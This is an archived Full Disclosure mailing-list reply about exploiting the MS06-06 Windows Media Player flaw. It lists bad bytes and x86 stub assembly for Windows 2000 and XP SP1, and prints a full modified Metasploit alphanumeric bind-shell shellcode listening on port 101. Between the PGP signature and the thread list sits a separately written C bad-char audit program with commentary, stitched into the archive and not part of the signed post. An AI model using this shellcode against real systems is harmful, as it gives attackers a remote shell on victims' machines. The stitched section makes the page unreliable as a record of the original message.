Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:45:03 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Not sure about what you are looking for, but read this below; it's from an unpublished PoC where I had to trick with 52 badchars:

- --------------------------------------------------------------------------------------------

52 BADCHARS:

0x00 0x22
0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69
0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79
0xE0 0xE1 0xE2 0xE3 0xE4 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF
0xF0 0xF1 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF

Due to the high number of bad chars, especially an upper/lower case conflict, I have used the msf bind shellcode port 101 with the PexAlphaNum encoder.

EB 03           JMP SHORT 0012EE63
59              POP ECX
EB 05           JMP SHORT 0012EE68
E8 F8FFFFFF     CALL 0012EE60

But it contains 7 bad chars, as you can see, so another way is (for 2k):

83C3 1C         ADD EBX,1C
53              PUSH EBX
59              POP ECX

Because ebx+1c is a fixed addr pointing where the alphanum shellcode starts, and so on, it is popped to ecx correctly, and 0 badchars.

And the one for XP SP1 (because there is no more direct pointer where I need it, but I found one near the dword of a reg):

834424 08 1C    ADD DWORD PTR SS:[ESP+8],1C
895C24 08       MOV EBX,DWORD PTR SS:[ESP+8]
53              PUSH EBX
59              POP ECX

- ------------------------------------------------------------------------------------------------

/* modded metasploit bind shellcode port 101 */
char scode1[] =
"\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59"
/* above this text is the modded header for 2k; it changes depending on the OS
   you exploit, read my exploit's header or debug for more information, this is
   how I trick with 52 badchars...
   thanks to msf guys for all the rest, this is a great alphanum uppercase
   shellcode, really appreciated here :) */
"\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
"\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38"
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36"
"\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57"
"\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30"
"\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d"
"\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56"
"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52"
"\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46"
"\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";

c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32
shellcode?
http://open-security.org/winmedia/index.html

--
regards
c0ntex

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ/UAb6+LRXunxpxfAQKY9Q//dxNp9p3Q1AzHMbvHrirmwUGDVc1Q1tdF
lR8EQvxImsMokCKUKReHaJSG2SpGdjacTBVJLIOYYQLt2efvc2C/j+OlaHC+Egna
Fvlyhyb+ACSorUtewXzMv4B9ydcVkJsEgZqbht2iundzgK22mC93zpucGOXWIVMZ
AMam5Hw9uGU6R5jgUxicV3XrU18TCOZIknTfgYuL7FUYF8foEhfwiGXPlVcFaSwE
3h1uudpbSSOgfIccrZkDnmxJ98Myli0NQ7uZ17Mcx2bYNN5p2895Mslkm8WIdloB
Rp4HgJEbCYzQOdExF6W2tdERq8HUe8bPW5qOGI7FhQRrhei7LvF7LSZTW2Icl2QH
GaRMNe3tcczGnQRAor2tUOT6go9CgV60QnoDljwAetuGRDuUZFw2RZnREFSQU5WU
YjS/yfk84Gp4BLJtefSWmvDdYe2Y5+zaRJqDeRoEhN41pBf0az/gZYJ07f1ybHyd
CKY6xtW5vtIe8tlWRsG7NBVV3Ug3Qxk4BuXGAtccJ/kO+aLu/3HgOsKwrpJnkdsK
DJSDwBWdr17YDh1VIfZZaHoDZA45xcOklf7ZGkgUsdDE8Kl3mxSLPHdSxdRpCqVx
FWf+3eyQZbvSkH81eJnLBAWG/7ojjRNRV+JjRwvMwwGstSjfKZCve9C05fGNpsD4
g1w1TdV1nR0=
=vOSt
-----END PGP SIGNATURE-----
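The whole argument in the message above rests on which bytes the target accepts. As an added example (not code from the post, from c0ntex, or from Metasploit), here is a small C audit that encodes the 52 bad bytes exactly as listed, counts how many of them appear in each of the three stubs quoted, and checks that the start of the PexAlphaNum decoder stays inside 0-9/A-Z. The stub bytes and the 22-byte decoder prefix are transcribed from the post; the lookup-table approach, the function names and the main() driver are ours.

```c
/* badchar_audit.c: added example, not code from the post or from Metasploit.
 * Encodes the 52 bad bytes listed in the post and audits candidate stubs
 * against them.  Build: cc -Wall -o badchar_audit badchar_audit.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 52 bad bytes exactly as the post lists them: 0x00, 0x22,
 * 0x61..0x69, 0x70..0x79, and 0xE0..0xFF with 0xF7 excluded. */
static const uint8_t badchars[52] = {
    0x00, 0x22,
    0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
    0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79,
    0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB,
    0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6,
    0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF,
};

/* Standard getPC stub quoted in the post: JMP / POP ECX / JMP / CALL back. */
static const uint8_t stub_getpc[] =
    { 0xEB, 0x03, 0x59, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF };
/* Windows 2000 replacement: ADD EBX,1C / PUSH EBX / POP ECX */
static const uint8_t stub_w2k[] = { 0x83, 0xC3, 0x1C, 0x53, 0x59 };
/* XP SP1 replacement: ADD [ESP+8],1C / MOV EBX,[ESP+8] / PUSH EBX / POP ECX */
static const uint8_t stub_xpsp1[] =
    { 0x83, 0x44, 0x24, 0x08, 0x1C, 0x89, 0x5C, 0x24, 0x08, 0x53, 0x59 };
/* First 22 bytes of the PexAlphaNum decoder as quoted in the post. */
static const uint8_t decoder_prefix[] =
    { 0x4f, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x51, 0x5a, 0x56, 0x54,
      0x58, 0x36, 0x33, 0x30, 0x56, 0x58, 0x34, 0x41, 0x30, 0x42, 0x36 };

/* 256-entry lookup: table[b] == 1 means byte b must not appear. */
static void build_badtable(uint8_t table[256])
{
    memset(table, 0, 256);
    for (size_t i = 0; i < sizeof badchars; i++)
        table[badchars[i]] = 1;
}

size_t badchar_count(void) { return sizeof badchars; }

/* Count bad bytes in buf; with verbose != 0, print each offending offset. */
size_t count_badchars(const uint8_t *buf, size_t len, int verbose)
{
    uint8_t table[256];
    size_t hits = 0;
    build_badtable(table);
    for (size_t i = 0; i < len; i++) {
        if (table[buf[i]]) {
            hits++;
            if (verbose)
                printf("  offset %zu: 0x%02X is a bad char\n", i, buf[i]);
        }
    }
    return hits;
}

/* 1 if every byte is in the uppercase-alphanumeric set (0-9, A-Z) that
 * the PexAlphaNum encoder emits, 0 otherwise. */
int is_upper_alnum(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t c = buf[i];
        if (!((c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z')))
            return 0;
    }
    return 1;
}

static void report(const char *name, const uint8_t *buf, size_t len)
{
    printf("%s (%zu bytes):\n", name, len);
    size_t bad = count_badchars(buf, len, 1);
    printf("  %zu bad byte(s), alnum-only: %s\n", bad,
           is_upper_alnum(buf, len) ? "yes" : "no");
}

int main(void)
{
    printf("bad-char list has %zu entries\n", badchar_count());
    report("getPC stub", stub_getpc, sizeof stub_getpc);
    report("2k stub", stub_w2k, sizeof stub_w2k);
    report("XP SP1 stub", stub_xpsp1, sizeof stub_xpsp1);
    report("decoder prefix", decoder_prefix, sizeof decoder_prefix);
    return 0;
}
```

Run as is, the audit reports 7 bad bytes in the getPC stub (both 0xEB, the 0xE8, the 0xF8 and the three 0xFF of the CALL displacement) and none in the two replacements or in the decoder prefix. The general lesson the numbers show: because the whole 0xE0..0xFF range is banned, every short CALL (0xE8) and JMP (0xEB) is unusable, so no call/jmp-based getPC trick can survive this filter; the replacements instead lean on a register or stack slot that already points near the payload at crash time, which is why the post needs a different stub per OS and why such a stub must be re-verified against the register state of each target rather than copied between them.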
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)